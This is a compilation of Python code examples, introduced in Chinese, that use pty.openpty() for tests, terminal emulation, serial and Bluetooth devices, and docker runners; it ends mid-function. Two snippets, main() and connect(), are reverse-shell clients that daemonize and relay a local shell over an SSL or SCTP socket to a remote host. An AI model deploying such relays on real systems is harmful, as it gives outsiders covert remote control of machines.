我们从Python开源项目中，提取了以下49个代码示例，用于说明如何使用pty.openpty()。
def popen_tty(cmd):
    """Open a process with stdin connected to a pseudo-tty.

    The command is run through the shell in a new session
    (``os.setsid``); its stdout and stderr are captured through pipes.

    :param cmd: command to run
    :type cmd: str
    :returns: (Popen, master) tuple, where master is the master side of
        the tty-pair.  It is the responsibility of the caller to close
        the master fd, and to perform any cleanup (including waiting
        for completion) of the Popen object.
    :rtype: (Popen, int)
    """
    import pty

    master, slave = pty.openpty()
    try:
        proc = subprocess.Popen(cmd,
                                stdin=slave,
                                stdout=subprocess.PIPE,
                                stderr=subprocess.PIPE,
                                preexec_fn=os.setsid,
                                close_fds=True,
                                shell=True)
    except BaseException:
        # The caller never receives the master fd when spawning fails,
        # so it has to be released here or it would leak.
        os.close(master)
        raise
    finally:
        # The child owns its own copy of the slave end; the parent's
        # copy is not needed whether or not the spawn succeeded.
        os.close(slave)
    return (proc, master)
def test_signal_failure(monkeypatch):
    """Exercise UnixConsole.prepare()/restore() while signal.signal raises.

    After a normal prepare/restore round trip, ``signal.signal`` is
    patched to raise ``ValueError`` for ``prepare()``, and then patched to
    raise ``AssertionError`` for the final ``restore()``.  The test passes
    only if neither call lets an exception escape.
    """
    import os
    import pty
    import signal
    from pyrepl.unix_console import UnixConsole

    def raise_value_error(signum, handler):
        raise ValueError

    def raise_assertion_error(signum, handler):
        raise AssertionError

    master_fd, slave_fd = pty.openpty()
    try:
        console = UnixConsole(slave_fd, slave_fd)

        # Plain round trip with the real signal.signal.
        console.prepare()
        console.restore()

        monkeypatch.setattr(signal, 'signal', raise_value_error)
        console.prepare()

        monkeypatch.setattr(signal, 'signal', raise_assertion_error)
        console.restore()
    finally:
        os.close(master_fd)
        os.close(slave_fd)
def test_ioctl_signed_unsigned_code_param(self):
    """Issue TIOCSWINSZ on a pty master with both spellings of the code.

    The request code is passed once as a non-negative value and once as
    the value obtained by reinterpreting it as a signed 32-bit integer.
    """
    if not pty:
        raise unittest.SkipTest('pty module required')

    master_fd, slave_fd = pty.openpty()
    try:
        if termios.TIOCSWINSZ < 0:
            signed_code = termios.TIOCSWINSZ
            unsigned_code = termios.TIOCSWINSZ & 0xffffffff
        else:
            unsigned_code = termios.TIOCSWINSZ
            (signed_code,) = struct.unpack(
                "i", struct.pack("I", termios.TIOCSWINSZ))

        winsize = struct.pack("HHHH", 80, 25, 0, 0)

        # test both with a positive and potentially negative ioctl code
        for request in (unsigned_code, signed_code):
            fcntl.ioctl(master_fd, request, winsize)
    finally:
        os.close(master_fd)
        os.close(slave_fd)
def __init__(self):
    """Set up the block, open a PTY and expose its slave as /tmp/kiss_pty.

    An existing symlink at /tmp/kiss_pty is replaced.  The 'in' message
    port is registered with ``self.handle_msg`` as its handler, and the
    ``count`` / ``dropped`` counters start at zero.
    """
    gr.sync_block.__init__(self,
                           name="hdlc_to_ax25",
                           in_sig=None,
                           out_sig=None)

    self.pty_master, self.pty_slave = pty.openpty()

    slave_name = os.ttyname(self.pty_slave)
    stale_link = os.path.islink('/tmp/kiss_pty')
    if stale_link:
        os.unlink('/tmp/kiss_pty')
    os.symlink(slave_name, '/tmp/kiss_pty')
    print('KISS PTY is: /tmp/kiss_pty (%s)' % os.ttyname(self.pty_slave))

    self.message_port_register_in(pmt.intern('in'))
    self.set_msg_handler(pmt.intern('in'), self.handle_msg)

    self.count = 0
    self.dropped = 0
def test_ioctl_signed_unsigned_code_param(self):
    """Call ioctl(TIOCSWINSZ) with a positive and a possibly negative code.

    Skipped when the ``pty`` module is unavailable.  Both PTY descriptors
    are closed even if one of the ioctl calls raises.
    """
    if not pty:
        raise unittest.SkipTest('pty module required')
    mfd, sfd = pty.openpty()
    try:
        if termios.TIOCSWINSZ < 0:
            set_winsz_opcode_maybe_neg = termios.TIOCSWINSZ
            # A plain literal is used instead of the Python-2-only
            # ``0xffffffffL`` spelling, which is a SyntaxError on
            # Python 3; the masked value is the same on both.
            set_winsz_opcode_pos = termios.TIOCSWINSZ & 0xffffffff
        else:
            set_winsz_opcode_pos = termios.TIOCSWINSZ
            # Reinterpret the unsigned 32-bit code as a signed int.
            set_winsz_opcode_maybe_neg, = struct.unpack(
                "i", struct.pack("I", termios.TIOCSWINSZ))

        our_winsz = struct.pack("HHHH", 80, 25, 0, 0)
        # test both with a positive and potentially negative ioctl code
        new_winsz = fcntl.ioctl(mfd, set_winsz_opcode_pos, our_winsz)
        new_winsz = fcntl.ioctl(mfd, set_winsz_opcode_maybe_neg, our_winsz)
    finally:
        os.close(mfd)
        os.close(sfd)
def _handles(stdin, stdout, stderr):
    """Resolve the ``PTY`` stdout marker into a real pseudo-terminal.

    Returns ``(stdin, stdout, stderr, master)``.  Unless ``stdout`` is the
    ``PTY`` sentinel the arguments are passed through untouched and
    ``master`` is ``None``; otherwise ``stdout`` becomes the slave fd of a
    new PTY and ``master`` is its master fd.
    """
    if stdout is not PTY:
        return stdin, stdout, stderr, None

    # Normally we could just use subprocess.PIPE and be happy.
    # Unfortunately, this results in undesired behavior when
    # printf() and similar functions buffer data instead of
    # sending it directly.
    #
    # By opening a PTY for STDOUT, the libc routines will not
    # buffer any data on STDOUT.
    pty_master, pty_slave = pty.openpty()

    # By making STDOUT a PTY, the OS will attempt to interpret
    # terminal control codes.  We don't want this, we want all
    # input passed exactly and perfectly to the process.
    for end in (pty_master, pty_slave):
        tty.setraw(end)

    # The slave side is the one handed to the child as its stdout.
    return stdin, pty_slave, stderr, pty_master
def command_background_start(self, cmd):
    """Run a background command: run it in a new thread and resume execution immediately.

    The command is started through the shell with stdout and stderr
    attached to the slave side of a new PTY.  This method returns after
    starting the worker thread and sleeping for two seconds.

    :param cmd: shell command line to run.
    """
    self.printer.debug('[LOCAL CMD] Local Background Command: %s' % cmd)

    def daemon(cmd):
        """Daemon used to run the command so to avoid blocking the UI"""
        # Run command
        master, slave = pty.openpty()
        # NOTE(review): ``proc`` and ``stdout`` are never used afterwards and
        # the slave fd is never closed in this process; they are kept as-is
        # because changing fd lifetimes could alter what the child sees -
        # confirm intent before cleaning up.
        proc = subprocess.Popen(cmd, shell=True, stdout=slave, stderr=slave, close_fds=True)
        stdout = os.fdopen(master)
        self.printer.info("Monitoring in background...Kill this process when you want to see the dumped content")

    # Run command in a thread
    d = threading.Thread(name='daemon', target=daemon, args=(cmd,))
    # Thread.setDaemon() is deprecated; the ``daemon`` attribute is the
    # supported spelling and has the same effect.
    d.daemon = True
    d.start()
    time.sleep(2)
def _do_it(self, action):
    """Send the play context and ``action`` to ``ansible-connection``.

    The helper process gets the slave side of a PTY as stdin; its stdout
    and stderr are captured through pipes.

    :returns: ``(returncode, stdout, stderr)`` of the helper process.
    """
    pty_master, pty_slave = pty.openpty()
    helper = subprocess.Popen(["ansible-connection"],
                              stdin=pty_slave,
                              stdout=subprocess.PIPE,
                              stderr=subprocess.PIPE)
    to_helper = os.fdopen(pty_master, 'wb', 0)
    os.close(pty_slave)

    # Need to force a protocol that is compatible with both py2 and py3.
    # That would be protocol=2 or less.
    # Also need to force a protocol that excludes certain control chars as
    # stdin in this case is a pty and control chars will cause problems.
    # that means only protocol=0 will work.
    pickled_context = cPickle.dumps(self._play_context.serialize(), protocol=0)

    send = to_helper.write
    send(pickled_context)
    send(b'\n#END_INIT#\n')
    send(to_bytes(action))
    send(b'\n\n')

    captured_out, captured_err = helper.communicate()
    to_helper.close()
    return (helper.returncode, captured_out, captured_err)
def popen_tty(cmd):
    """Open a process with stdin connected to a pseudo-tty.

    The command is run through the shell in a new session
    (``os.setsid``); its stdout and stderr are captured through pipes.

    :param cmd: command to run
    :type cmd: str
    :returns: (Popen, master) tuple, where master is the master side of
        the tty-pair.  It is the responsibility of the caller to close
        the master fd, and to perform any cleanup (including waiting
        for completion) of the Popen object.
    :rtype: (Popen, int)
    """
    master, slave = pty.openpty()
    try:
        proc = subprocess.Popen(cmd,
                                stdin=slave,
                                stdout=subprocess.PIPE,
                                stderr=subprocess.PIPE,
                                preexec_fn=os.setsid,
                                close_fds=True,
                                shell=True)
    except BaseException:
        # The caller never receives the master fd when spawning fails,
        # so it has to be released here or it would leak.
        os.close(master)
        raise
    finally:
        # The child owns its own copy of the slave end; the parent's
        # copy is not needed whether or not the spawn succeeded.
        os.close(slave)
    return (proc, master)
def __init__(self, message_q):
    """Store the message queue and allocate a PTY.

    ``self.tty`` is the device name of the PTY's slave side.
    """
    QThread.__init__(self)
    self.messages = message_q

    # Only the inferior process need use the slave file descriptor
    pty_pair = pty.openpty()
    self.master, self.slave = pty_pair
    self.tty = os.ttyname(self.slave)
def getPty(self, term, windowSize, modes):
    """Record the terminal settings and allocate a PTY.

    Stores ``term`` as ``TERM`` in ``self.environ``, keeps ``windowSize``
    and ``modes`` on the instance, and sets ``self.ptyTuple`` to
    ``(master_fd, slave_fd, slave_device_name)``.  The slave device name
    is also stored as ``SSH_TTY`` in ``self.environ``.
    """
    self.environ['TERM'] = term
    self.winSize, self.modes = windowSize, modes

    master_fd, slave_fd = pty.openpty()
    slave_name = os.ttyname(slave_fd)

    self.environ['SSH_TTY'] = slave_name
    self.ptyTuple = (master_fd, slave_fd, slave_name)
def __init__(self):
    """Allocate a PTY and prepare (but do not start) the worker thread.

    ``self._s_name`` is the device name of the PTY's slave side; the
    thread stored in ``self._fake_device`` targets ``self.__run``.
    """
    pty_pair = pty.openpty()
    self._master, self._slave = pty_pair
    self._s_name = os.ttyname(self._slave)
    self._fake = Faker()
    worker = threading.Thread(target=self.__run)
    self._fake_device = worker
def test_readline():
    """A line written to the PTY master is read back as bytes, newline removed."""
    pty_master, pty_slave = pty.openpty()
    wrapper = _ReadlineWrapper(pty_slave, pty_slave)

    os.write(pty_master, b'input\n')

    reader = wrapper.get_reader()
    line = reader.readline()
    assert line == b'input'
    assert isinstance(line, bytes_type)
def test_readline_returns_unicode():
    """With ``returns_unicode=True`` the line comes back as a text string."""
    pty_master, pty_slave = pty.openpty()
    wrapper = _ReadlineWrapper(pty_slave, pty_slave)

    os.write(pty_master, b'input\n')

    reader = wrapper.get_reader()
    line = reader.readline(returns_unicode=True)
    assert line == 'input'
    assert isinstance(line, unicode_type)
def test_raw_input():
    """``raw_input`` returns the typed line as bytes, newline removed."""
    pty_master, pty_slave = pty.openpty()
    wrapper = _ReadlineWrapper(pty_slave, pty_slave)

    os.write(pty_master, b'input\n')

    answer = wrapper.raw_input('prompt:')
    assert answer == b'input'
    assert isinstance(answer, bytes_type)
def spawn(self, argv=None, term=None):
    """Start a program (a shell by default) attached to a new PTY.

    :param argv: argument vector to run.  When ``None``, ``$SHELL`` is
        used if set; otherwise the first of bash/sh/ksh/zsh/csh/ash found
        as a regular file on ``$PATH``.  An empty result falls back to
        ``/bin/sh``.
    :param term: when not ``None``, stored as ``TERM`` in ``os.environ``
        before the program is started.

    Sets ``self.slave`` (slave fd), ``self.master`` (unbuffered,
    non-blocking file object over the master fd) and ``self.prog`` (the
    ``Popen`` object).
    """
    if argv is None:
        if 'SHELL' in os.environ:
            argv = [os.environ['SHELL']]
        elif 'PATH' in os.environ:
            # searching sh in the path. It can be unusual like
            # /system/bin/sh on android
            for shell in ["bash", "sh", "ksh", "zsh", "csh", "ash"]:
                for path in os.environ['PATH'].split(':'):
                    fullpath = os.path.join(path.strip(), shell)
                    if os.path.isfile(fullpath):
                        argv = [fullpath]
                        break
                if argv:
                    break
    if not argv:
        argv = ['/bin/sh']
    if term is not None:
        os.environ['TERM'] = term

    master, slave = pty.openpty()
    self.slave = slave
    # open file in an unbuffered mode.  The mode used to be 'rb+wb', which
    # Python 3 rejects; 'rb+' is the valid spelling of binary read/write.
    self.master = os.fdopen(master, 'rb+', 0)

    flags = fcntl.fcntl(self.master, fcntl.F_GETFL)
    assert flags >= 0
    flags = fcntl.fcntl(self.master, fcntl.F_SETFL, flags | os.O_NONBLOCK)
    assert flags >= 0

    self.prog = subprocess.Popen(
        shell=False,
        args=argv,
        stdin=slave,
        stdout=slave,
        stderr=subprocess.STDOUT,
        preexec_fn=prepare
    )
def __init__(self, command=None, return_url=None, restart=False):
    """Create a terminal record backed by a new PTY.

    Stores the arguments on the instance, assigns an id from
    ``prism.generate_random_string(8)``, and builds a ``TerminalProcess``
    from the two descriptors returned by ``pty.openpty()``.
    """
    self.command = command
    self.terminal_id = prism.generate_random_string(8)
    self.return_url = return_url
    self.restart = restart

    master_fd, slave_fd = pty.openpty()
    self.process = TerminalProcess(master_fd, slave_fd)

    logging.info('Terminal Opened: %s' % self.terminal_id)
def __init__(self, name):
    """If possible, connect to serial port

    Opens ``name`` at 9600 baud.  If that raises
    ``serial.SerialException`` a PTY is created and its slave device is
    opened as the serial port instead, with a warning logged.

    :param name: serial port to open.
    """
    # Try to establish connection to serial port
    try:
        self.serial_connection = serial.Serial(name, 9600)
        self.serial_connection_established = True
    # If it fails because there is no device, use virtual serial port
    except serial.SerialException:
        # Create virtual serial port
        self.master, self.slave = pty.openpty()
        self.vPort = os.ttyname(self.slave)
        # Create instance
        self.serial_connection = serial.Serial(self.vPort, 9600)
        self.serial_connection_established = True
        # logging.warn() is a deprecated alias of logging.warning().
        logging.warning("Trigger device not found -> Using virtual device")

    # Create events
    self.trigger_event = threading.Event()
    self.eventProgramEnd = threading.Event()

    # Store current time
    self.last_trigger_time = time.time()
    self.firstRun = True

    # Call initialization of thread class
    threading.Thread.__init__(self)
def make_slave_pty():
    """Yield the slave fd of a freshly opened PTY, then close both ends.

    The cleanup runs in a ``finally`` clause so the descriptors are
    released even when the consumer raises into the generator or closes
    it early, instead of only when it is resumed normally.
    """
    master_pty, slave_pty = pty.openpty()
    try:
        yield slave_pty
    finally:
        os.close(slave_pty)
        os.close(master_pty)
def main():
    # Relay data between the connection returned by establish_connection()
    # and a SHELL process whose stdin/stdout/stderr are the slave side of a
    # PTY.  Returns -1 when no connection could be established; otherwise
    # falls off the end (returns None) once the relay loop finishes.
    s = establish_connection()
    if s is None:
        return -1
    print success("Connection established!")
    daemonize()
    master, slave = pty.openpty()
    # NOTE(review): neither `master` nor `slave` is closed in this function.
    bash = subprocess.Popen(SHELL, preexec_fn=os.setsid, stdin=slave, stdout=slave, stderr=slave, universal_newlines=True)
    time.sleep(1)  # Wait for bash to start before sending data to it.
    os.write(master, "%s\n" % FIRST_COMMAND)
    try:
        # Loop until the shell process has exited.
        while bash.poll() is None:
            r, w, e = select.select([s, master], [], [])
            # SSLSockets don't play nice with select because they buffer data internally.
            # Code taken from https://stackoverflow.com/questions/3187565/select-and-ssl-in-python.
            if s in r:
                try:
                    data = s.recv(1024)
                except ssl.SSLError as e:
                    # A WANT_READ error is retried on the next loop pass;
                    # any other SSL error propagates.
                    if e.errno == ssl.SSL_ERROR_WANT_READ:
                        continue
                    raise
                if not data:  # End of file.
                    break
                # Drain whatever the SSL layer still has buffered before
                # handing the data to the shell.
                data_left = s.pending()
                while data_left:
                    data += s.recv(data_left)
                    data_left = s.pending()
                os.write(master, data)
            elif master in r:
                # Shell output is only forwarded on passes where the
                # connection itself was not readable.
                s.write(os.read(master, 2048))
    finally:
        s.close()
def test_rip_error(request, tmpdir):
    """Test failed rips error handling.

    The ISO is truncated while the container is running, and the test
    expects the failure message in the output, a positive exit status and
    a failed-file marker in the output directory.

    :param request: pytest fixture.
    :param py.path.local tmpdir: pytest fixture.
    """
    # Duplicate ISO.
    iso = tmpdir.join('truncated.iso')
    sample = py.path.local(__file__).dirpath().join('sample.iso')
    sample.copy(iso)

    # Load the ISO.
    pytest.cdload(iso)

    # Execute.
    output = tmpdir.ensure_dir('output')
    volume = '{}:/output'.format(output)
    command = ['docker', 'run', '--device=/dev/cdrom', '-v', volume, '-e', 'DEBUG=true', 'robpol86/makemkv']
    master, slave = pty.openpty()

    def close_pty():
        return [os.close(master), os.close(slave)]

    request.addfinalizer(close_pty)
    proc = subprocess.Popen(
        command,
        bufsize=1,
        cwd=HERE,
        stderr=subprocess.STDOUT,
        stdin=slave,
        stdout=subprocess.PIPE,
    )

    # Read output.
    saw_failure = False
    while proc.poll() is None or proc.stdout.peek(1):
        for line in proc.stdout:
            # Watch for specific line, then truncate ISO.
            if b'Analyzing seamless segments' in line:
                iso.open('w').close()
            elif b'ERROR: One or more titles failed.' in line:
                saw_failure = True
            print(line)  # Write to stdout, pytest will print if test fails.

    # Verify.
    assert proc.poll() > 0
    assert saw_failure is True
    pytest.verify_failed_file(output)
def test_run_colored_output(self):
    """Run the CLI with stdout/stderr on a PTY and compare the colored report.

    ``sys.stdout`` and ``sys.stderr`` are replaced by a file object over
    the PTY slave; the report is then read back from the master side.
    """
    file = os.path.join(self.wd, 'a.yaml')

    # Create a pseudo-TTY and redirect stdout to it
    master, slave = pty.openpty()
    sys.stdout = sys.stderr = os.fdopen(slave, 'w')

    with self.assertRaises(SystemExit) as ctx:
        cli.run((file, ))
    sys.stdout.flush()

    self.assertEqual(ctx.exception.code, 1)

    # Read output from TTY
    output = os.fdopen(master, 'r')
    # File *status* flags must be read with F_GETFL; the previous F_GETFD
    # returned descriptor flags, which were then written back via F_SETFL.
    flag = fcntl.fcntl(master, fcntl.F_GETFL)
    fcntl.fcntl(master, fcntl.F_SETFL, flag | os.O_NONBLOCK)

    out = output.read().replace('\r\n', '\n')

    sys.stdout.close()
    sys.stderr.close()
    output.close()

    self.assertEqual(out, (
        '\033[4m%s\033[0m\n'
        ' \033[2m2:4\033[0m \033[31merror\033[0m '
        'trailing spaces \033[2m(trailing-spaces)\033[0m\n'
        ' \033[2m3:4\033[0m \033[31merror\033[0m '
        'no new line character at the end of file '
        '\033[2m(new-line-at-end-of-file)\033[0m\n'
        '\n' % file))
def launch_textmode_app(self, executable, name):
    """Run ``executable`` with its output on a PTY shown in a dialog.

    The process's stdout and stderr are attached to the PTY slave; the
    dialog is given the process and the master fd to poll, then executed.
    Both PTY descriptors are closed afterwards, including when starting
    the process or running the dialog raises.

    :param executable: program to start (converted with ``str``).
    :param name: name passed to ``TextmodeDialog``.
    """
    dialog = TextmodeDialog(name, self.w)
    self.app_executable = executable
    master_fd, slave_fd = pty.openpty()
    try:
        self.app_process = subprocess.Popen(str(executable), stdout=slave_fd, stderr=slave_fd)
        dialog.poll(self.app_process, master_fd)
        dialog.exec_()
    finally:
        # Previously the descriptors leaked whenever anything above raised.
        os.close(master_fd)
        os.close(slave_fd)
def __init__(self, hci_device_number=0, logger=None, events_config=None):
    # Bring the HCI device down, open a user-channel socket to it, then
    # create a PTY and attach its slave side with `hciattach`, so that
    # this object holds both the HCI socket and the PTY master as inputs.
    #
    # hci_device_number: index of the HCI device (default 0).
    # logger: logger to use; falls back to logging.getLogger(__name__).
    # events_config: passed to EventParser as `config`.
    #
    # Raises subprocess.CalledProcessError if `hciconfig ... down` or
    # `hciattach` exits non-zero (the error is logged and re-raised).
    self._logger = logger or logging.getLogger(__name__)
    self._event_parser = EventParser(config=events_config, logger=self._logger)
    self._agent_events_sender = AgentEventsSender(logger=self._logger)
    self._hci_device_number = hci_device_number
    try:
        subprocess.check_call(['hciconfig', self.hci_device_name, 'down'])
    except subprocess.CalledProcessError:
        self._logger.error('Could not run hciconfig down command for HCI device')
        raise
    self._hci_socket = create_bt_socket_hci_channel_user(hci_device_number)
    self._logger.info('bind to %s complete', self.hci_device_name)
    # Only the master fd is kept on the instance; the slave fd stays a
    # local and is referenced by device name below.
    self._pty_master, pty_slave = pty.openpty()
    # NOTE(review): 'rwb' is not a mode Python 3's open()/fdopen() accepts;
    # confirm this only runs on Python 2.
    self._pty_fd = os.fdopen(self._pty_master, 'rwb')
    hci_tty = os.ttyname(pty_slave)
    self._logger.debug('TTY slave for the virtual HCI: %s', hci_tty)
    try:
        subprocess.check_call(['hciattach', hci_tty, 'any'])
    except subprocess.CalledProcessError:
        self._logger.error('Could not run hciattach on PTY device')
        raise
    self._inputs = [self._pty_fd, self._hci_socket]
    self._pty_buffer = StringIO()  # Used as a seekable stream
    self._gatt_logger = GattLogger(self._logger)
    self._should_stop = False
def setUp(self):
    """Allocate a PTY and keep both descriptors on the test instance."""
    # Open PTY
    pty_pair = pty.openpty()
    self.master, self.slave = pty_pair
def connect(host, port, disable_encryption = False):
    # Connect an SCTP socket to (host, port) and attach a $SHELL process to
    # it, either directly (disable_encryption=True) or through a TLS
    # wrapper with the shell's output on a PTY.
    #
    # NOTE(review): the original layout of this function was flattened; the
    # nesting below assumes process_connection() belongs to the encrypted
    # branch (the only branch that defines `ssl_sock`) and that
    # sock.close() runs for both branches - confirm against the upstream
    # source.
    sock = sctp_socket(family = socket.AF_INET)
    sock.connect((host, port))
    if disable_encryption:
        # The shell reads from and writes to file objects made from the
        # socket itself.
        std_out = sock.sock().makefile("w")
        std_in = sock.sock().makefile()
        shell = Popen(os.environ["SHELL"], stdin = std_in, stdout = std_out, shell = True)
    else:
        ssl_sock = ssl.wrap_socket(sock.sock(), ssl_version = ssl.PROTOCOL_TLSv1)
        ssl_sock.send("Hi! This is the client. You're connected.\n")
        # NOTE(review): this pipe and the two file objects built from it
        # are not used again in this function.
        r, w = os.pipe()
        std_in = os.fdopen(r, "r")
        std_out = os.fdopen(w, "w")
        #Set our shell up to use pty, and make the output non-blocking.
        master, slave = pty.openpty()
        shell = Popen(os.environ["SHELL"], stdin = PIPE, stdout = slave, shell = True)
        # Replace the Popen object's stdout with a file object over a
        # duplicate of the PTY master, then switch it to non-blocking.
        shell.stdout = os.fdopen(os.dup(master), "r+")
        fd = shell.stdout.fileno()
        fl = fcntl.fcntl(fd, fcntl.F_GETFL)
        fcntl.fcntl(fd, fcntl.F_SETFL, fl | os.O_NONBLOCK)
        process_connection(ssl_sock, shell.stdin, shell.stdout, disable_encryption)
    sock.close()
def __start_proc(self):
    """Start ``self.elf_path`` on a raw-mode PTY.

    The child gets the slave side as stdin/stdout/stderr.  Afterwards
    ``self.proc.stdin``, ``.stdout`` and ``.stderr`` are file objects over
    duplicates of the master fd, and the stdout one is made non-blocking.
    """
    # for more information, pls refer :
    # http://rachid.koucha.free.fr/tech_corner/pty_pdip.html

    # open new pty
    master_fd, slave_fd = pty.openpty()

    # set to raw mode
    for end in (master_fd, slave_fd):
        tty.setraw(end)

    # binding slave in to subprocess
    self.proc = Popen(
        self.elf_path,
        stdin=slave_fd,
        stdout=slave_fd,
        stderr=slave_fd,
        close_fds=True,
        preexec_fn=self.preexec_fn,
        env=self.env,
        shell=True,
    )
    self.pid = self.proc.pid
    print('[+] Start pid : %d' % self.pid)

    # binding master to own controlled file descriptors
    for stream_name in ('stdin', 'stdout', 'stderr'):
        setattr(self.proc, stream_name, os.fdopen(os.dup(master_fd), "r+"))

    # close unnecessary file descriptors
    os.close(slave_fd)
    os.close(master_fd)

    # set non-blocking mode
    out_fd = self.proc.stdout.fileno()
    status_flags = fcntl.fcntl(out_fd, fcntl.F_GETFL)
    fcntl.fcntl(out_fd, fcntl.F_SETFL, status_flags | os.O_NONBLOCK)
def test_posix_printengine_tty(self):
    """Test POSIX print engine tty mode."""
    captured = six.StringIO()
    chunk_size = 1024

    def drain_master(stream):
        """Drain data from stream and discard until eof."""
        chunk = stream.read(chunk_size)
        # A short read is taken to mean EOF; that final chunk is not
        # recorded.
        while len(chunk) >= chunk_size:
            print(chunk, file=captured)
            chunk = stream.read(chunk_size)

    #
    # - Allocate a pty
    # - Create a thread to drain off the master side; without
    #   this, the slave side will block when trying to write.
    # - Connect the printengine to the slave side
    # - Set it running
    #
    master_fd, slave_fd = pty.openpty()
    slave_file = os.fdopen(slave_fd, "w")
    master_file = os.fdopen(master_fd, "r")

    drainer = threading.Thread(target=drain_master, args=(master_file,))
    drainer.start()

    printengine.test_posix_printengine(slave_file, True)
    slave_file.close()

    drainer.join()
    master_file.close()
    self.assertTrue(len(captured.getvalue()) > 0)
def __t_pty_tracker(self, trackerclass, **kwargs):
    """Run the progress-tracker test with output going to a PTY slave.

    ``trackerclass`` is instantiated with ``output_file`` set to the slave
    side plus ``**kwargs``; a helper thread discards whatever arrives on
    the master side.
    """
    chunk_size = 1024

    def drain_master(stream):
        # A short read is taken to mean EOF.
        while len(stream.read(chunk_size)) >= chunk_size:
            pass

    #
    # - Allocate a pty
    # - Create a thread to drain off the master side; without
    #   this, the slave side will block when trying to write.
    # - Connect the prog tracker to the slave side
    # - Set it running
    #
    master_fd, slave_fd = pty.openpty()
    slave_file = os.fdopen(slave_fd, "w")
    master_file = os.fdopen(master_fd, "rb")

    drainer = threading.Thread(target=drain_master, args=(master_file,))
    drainer.start()

    tracker = trackerclass(output_file=slave_file, **kwargs)
    progress.test_progress_tracker(tracker, gofast=True)
    slave_file.close()

    drainer.join()
    master_file.close()
def startShell(self, mnopts=None):
    # Stop any existing shell, then start `docker run -ti` for
    # self.docker_image with the container's stdio on a PTY, and record
    # the container's PID as reported by `docker inspect`.
    #
    # mnopts: accepted but not used in this method.
    self.stop()
    # Build the `docker run` command line.
    args = ['docker', 'run', '-ti', '--rm', '--privileged=true']
    args.extend(['--hostname=' + self.name, '--name=' + self.name])
    args.extend(['-e', 'DISPLAY'])
    args.extend(['-v', '/tmp/.X11-unix:/tmp/.X11-unix:ro'])
    print self.port_map
    if self.port_map is not None:
        # Each entry is indexed as (p[0], p[1]) and becomes `-p a:b`.
        for p in self.port_map:
            args.extend(['-p', '%d:%d' % (p[0], p[1])])
    if self.fs_map is not None:
        # Each entry is indexed as (f[0], f[1]) and becomes `-v a:b`.
        for f in self.fs_map:
            args.extend(['-v', '%s:%s' % (f[0], f[1])])
    args.extend([self.docker_image])
    master, slave = pty.openpty()
    self.shell = subprocess.Popen(
        args, stdin=slave, stdout=slave, stderr=slave,
        close_fds=True, preexec_fn=os.setpgrp)
    os.close(slave)
    # One file object over the master serves as both stdin and stdout.
    # NOTE(review): 'rw' is not a mode Python 3's open()/fdopen() accepts;
    # confirm this only runs on Python 2.
    ttyobj = os.fdopen(master, 'rw')
    self.stdin = ttyobj
    self.stdout = ttyobj
    self.pid = self.shell.pid
    self.pollOut = select.poll()
    self.pollOut.register(self.stdout)
    # Map the file descriptors back to this node.
    self.outToNode[self.stdout.fileno()] = self
    self.inToNode[self.stdin.fileno()] = self
    self.execed = False
    self.lastCmd = None
    self.lastPid = None
    self.readbuf = ''
    self.waiting = False
    # Wait for prompt
    time.sleep(1)
    # Replace self.pid (set above from the docker client process) with the
    # first line printed by `docker inspect`, converted to int.
    pid_cmd = ['docker', 'inspect', '--format=\'{{ .State.Pid }}\'', self.name]
    pidp = subprocess.Popen(
        pid_cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE,
        stderr=subprocess.STDOUT, close_fds=False)
    pidp.wait()
    ps_out = pidp.stdout.readlines()
    self.pid = int(ps_out[0])
    self.cmd('export PS1=\"\\177\"; printf "\\177"')
    self.cmd('stty -echo; set +m')
def run(command=None, args=None, output=None, image_id=None, environ=None, cwd=None):
    """Run a command and return the output. Supports string and py.path paths.

    Commands whose first element is ``bash`` or ``docker`` get the slave
    side of a PTY as stdin; other commands inherit stdin.  The timeout is
    120 seconds for ``docker`` and 30 seconds otherwise.

    :raise CalledProcessError: Command exits non-zero.

    :param iter command: Command to run.
    :param iter args: List of command line arguments to insert to command
        (placed before the command's last element).
    :param str output: Path to bind mount to /output when `command` is None.
    :param str image_id: Docker image to use instead of robpol86/makemkv.
    :param dict environ: Environment variables to set/override in the command.
    :param str cwd: Current working directory. Default is tests directory.

    :return: Command stdout and stderr output.
    :rtype: tuple
    """
    if command is None:
        command = ['docker', 'run', '--device=/dev/cdrom', '-e', 'DEBUG=true', image_id or 'robpol86/makemkv']
        if output:
            command = command[:-1] + ['-v', '{}:/output'.format(output)] + command[-1:]
    if args:
        command = command[:-1] + list(args) + command[-1:]

    env = os.environ.copy()
    if environ:
        env.update(environ)

    # Simulate stdin pty so 'docker run -it' doesn't complain.  ``None``
    # (not 0) marks "no pty": 0 is a valid descriptor number, so using it
    # as the sentinel could skip both the redirect and the cleanup.
    master = slave = None
    if command[0] in ('bash', 'docker'):
        master, slave = pty.openpty()

    # Determine timeout.
    timeout = 120 if command[0] in ('docker',) else 30

    # Run command.
    try:
        result = subprocess.run(
            [str(i) for i in command],
            check=True, cwd=cwd or HERE, env=env,
            stderr=subprocess.PIPE, stdin=slave, stdout=subprocess.PIPE,
            timeout=timeout
        )
    finally:
        for fd in (slave, master):
            if fd is not None:
                os.close(fd)

    return result.stdout, result.stderr
def runShell(script, env=None, cwd="/", user=None, base64_encode=False):
    # Run `script` through bash (or through `su <user>` when `user` differs
    # from the current user) with stdout/stderr on a PTY, and collect the
    # output.
    #
    # script: shell script text; an empty value returns (0, "") at once.
    # env, cwd: passed straight to Popen.
    # user: account to run as; falsy or equal to the current user means
    #       "run directly with bash".
    # base64_encode: when true, `script` is base64-decoded first.
    #
    # Returns (status, outputs): the process return code and everything
    # read from the PTY master, or (1, str(error)) if setup fails.

    # check script
    import pwd, grp
    import pty
    if not script:
        return 0, ""
    try:
        # base64 decode
        if base64_encode:
            decode_script = base64.decodestring(script)
        else:
            decode_script = script
        # check user
        logger.info(decode_script)
        cur_user = pwd.getpwuid(os.getuid())[0]
        if not user or user == cur_user:
            shell_list = ["bash", "-c", decode_script.encode('utf8')]
        else:
            shell_list = ["su", user, "-c", decode_script.encode('utf8'), "-s", "/bin/bash"]
        master_fd, slave_fd = pty.openpty()
        # NOTE(review): if Popen raises, the except branch below returns
        # without closing master_fd / slave_fd.
        proc = Popen(shell_list, shell=False, universal_newlines=True, bufsize=1,
                     stdout=slave_fd, stderr=STDOUT, env=env, cwd=cwd, close_fds=True)
    except Exception, e:
        logger.error(e)
        return (1, str(e))
    timeout = .1
    outputs = ''
    # Poll the master side every `timeout` seconds until the process has
    # exited and nothing is left to read.
    while True:
        try:
